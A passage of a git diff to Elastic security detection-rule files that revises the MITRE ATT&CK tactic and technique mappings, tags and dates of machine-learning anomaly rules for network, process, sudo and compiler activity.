+framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat.technique]] +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" + diff --git a/rules/ml/ml_linux_anomalous_network_activity.toml b/rules/ml/ml_linux_anomalous_network_activity.toml index b1e1b9fef20..6993543b038 100644 --- a/rules/ml/ml_linux_anomalous_network_activity.toml +++ b/rules/ml/ml_linux_anomalous_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 @@ -82,18 +82,68 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "52afbdc5-db15-485e-bc24-f5707f820c4b" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + diff --git a/rules/ml/ml_linux_anomalous_network_port_activity.toml b/rules/ml/ml_linux_anomalous_network_port_activity.toml index 58d52643cb3..be92e900df7 100644 --- a/rules/ml/ml_linux_anomalous_network_port_activity.toml +++ b/rules/ml/ml_linux_anomalous_network_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 @@ -72,7 +72,14 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "3c7e32e6-6104-46d9-a06e-da0f8b5795a0" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" note = """## Triage and analysis @@ -114,12 +121,39 @@ In Linux environments, network ports facilitate communication between applicatio [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique]] id = "T1571" name = "Non-Standard Port" reference = "https://attack.mitre.org/techniques/T1571/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + diff --git a/rules/ml/ml_low_count_events_for_a_host_name.toml b/rules/ml/ml_low_count_events_for_a_host_name.toml index caedf9aab62..d2128f0bf36 100644 --- a/rules/ml/ml_low_count_events_for_a_host_name.toml +++ b/rules/ml/ml_low_count_events_for_a_host_name.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 @@ -92,3 +92,28 @@ Host-based traffic monitoring is crucial for identifying anomalies in network ac - Monitor network traffic for any signs of unusual activity or attempts to exploit the situation further. - Escalate the incident to the security operations team for a deeper forensic analysis and to determine if additional hosts are affected.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat.technique]] +id = "T1499" +name = "Endpoint Denial of Service" +reference = "https://attack.mitre.org/techniques/T1499/" diff --git a/rules/ml/ml_packetbeat_rare_server_domain.toml b/rules/ml/ml_packetbeat_rare_server_domain.toml index 211e1efd87e..21d0d1aac74 100644 --- a/rules/ml/ml_packetbeat_rare_server_domain.toml +++ b/rules/ml/ml_packetbeat_rare_server_domain.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 @@ -81,7 +81,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "17e68559-b274-4948-ad0b-f8415bb31126" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -121,6 +121,42 @@ Machine learning models analyze network traffic to identify atypical domain name [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" @@ -131,12 +167,16 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" -[[rule.threat.technique.subtechnique]] -id = "T1071.004" -name = "DNS" -reference = "https://attack.mitre.org/techniques/T1071/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + diff --git a/rules/ml/ml_rare_destination_country.toml b/rules/ml/ml_rare_destination_country.toml index 0cc3e8c8ee9..7c1f674b243 100644 --- a/rules/ml/ml_rare_destination_country.toml +++ b/rules/ml/ml_rare_destination_country.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 @@ -77,7 +77,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "35f86980-1fb1-4dff-b311-3be941549c8d" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -118,25 +118,67 @@ Machine learning models analyze network logs to identify traffic to uncommon des [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + diff --git a/rules/ml/ml_spike_in_traffic_to_a_country.toml b/rules/ml/ml_spike_in_traffic_to_a_country.toml index a5cf353a99d..9c9c130f549 100644 --- a/rules/ml/ml_spike_in_traffic_to_a_country.toml +++ b/rules/ml/ml_spike_in_traffic_to_a_country.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 @@ -112,44 +112,58 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "c7db5533-ca2a-41f6-a8b0-ee98abe0f573" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Tactic: Reconnaissance", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" + [[rule.threat.technique]] id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/ml_windows_anomalous_network_activity.toml b/rules/ml/ml_windows_anomalous_network_activity.toml index e2fb8c87705..3df432d3263 100644 --- a/rules/ml/ml_windows_anomalous_network_activity.toml +++ b/rules/ml/ml_windows_anomalous_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 @@ -79,31 +79,68 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + diff --git a/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml b/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml index 11b70e142fa..3df45d5fb94 100644 --- a/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml +++ b/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/06/18" [rule] anomaly_threshold = 50 @@ -124,3 +124,21 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/ml/persistence_ml_rare_process_by_host_linux.toml b/rules/ml/persistence_ml_rare_process_by_host_linux.toml index cbda6deb409..27b54cff337 100644 --- a/rules/ml/persistence_ml_rare_process_by_host_linux.toml +++ b/rules/ml/persistence_ml_rare_process_by_host_linux.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 50 @@ -114,35 +114,31 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "46f804f5-b289-43d6-a881-9387cf594f75" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Persistence", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/ml/persistence_ml_rare_process_by_host_windows.toml b/rules/ml/persistence_ml_rare_process_by_host_windows.toml index c237bb227e6..bea679b8ed2 100644 --- a/rules/ml/persistence_ml_rare_process_by_host_windows.toml +++ b/rules/ml/persistence_ml_rare_process_by_host_windows.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/27" [transform] [[transform.osquery]] @@ -168,3 +168,21 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/ml/persistence_ml_windows_anomalous_path_activity.toml b/rules/ml/persistence_ml_windows_anomalous_path_activity.toml index 3ada406bbf5..ce8453a6836 100644 --- a/rules/ml/persistence_ml_windows_anomalous_path_activity.toml +++ b/rules/ml/persistence_ml_windows_anomalous_path_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 50 @@ -108,22 +108,49 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Persistence", + "Tactic: Execution", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml b/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml index 250fbaa439f..f9ada397b67 100644 --- a/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml +++ b/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -169,3 +169,33 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml index bf041396252..f498ba198b9 100644 --- a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml +++ b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -161,27 +161,26 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Persistence", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml index b76ecf594fd..c41b0d62e61 100644 --- a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml +++ b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 75 @@ -122,18 +122,26 @@ Sudo is a command in Unix-like systems that allows permitted users to execute co - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.003" -name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml index 454ceb65ca1..8485f372dbb 100644 --- a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml +++ b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] anomaly_threshold = 50 @@ -119,22 +119,8 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.004" -name = "Elevated Execution with Prompt" -reference = "https://attack.mitre.org/techniques/T1548/004/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml index 3b0275cb450..8c04edd604d 100644 --- a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml +++ b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 50 @@ -121,3 +121,21 @@ Compilers transform source code into executable programs, a crucial step in soft - Restore the system from a known good backup if malicious code execution is confirmed, ensuring that the backup is free from compromise. - Implement stricter access controls and monitoring for compiler usage, ensuring only authorized users can execute compilers. - Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.""" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1588" +name = "Obtain Capabilities" +reference = "https://attack.mitre.org/techniques/T1588/" +[[rule.threat.technique.subtechnique]] +id = "T1588.001" +name = "Malware" +reference = "https://attack.mitre.org/techniques/T1588/001/" + + + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" + diff --git a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml index 284a87291a3..e586f7519a8 100644 --- a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml +++ b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw", "fortinet_fortigate", "sonicwall_firewall", "suricata"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/18" [rule] author = ["Elastic"] @@ -73,7 +73,18 